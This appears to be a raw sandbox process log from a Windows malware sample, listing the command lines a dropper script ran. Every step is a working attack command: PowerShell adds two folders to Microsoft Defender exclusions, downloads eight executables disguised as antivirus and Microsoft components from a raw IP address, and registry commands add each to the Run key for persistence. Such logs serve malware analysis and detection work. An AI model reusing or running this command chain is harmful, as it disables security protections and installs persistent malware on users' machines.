cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" C:\Users\test22\AppData\Local\Temp\lamda.cmd
2564powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
2724powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'"
2836powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
2928powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'"
3020powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
1152powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
1484powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
2268powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
2468powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'"
2600powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'"
2832powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'"
2776powershell.exe powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'"
2940reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
2064reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
2204reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
2368reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
2456reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f
2580reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f
2128reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f
1304reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f
2868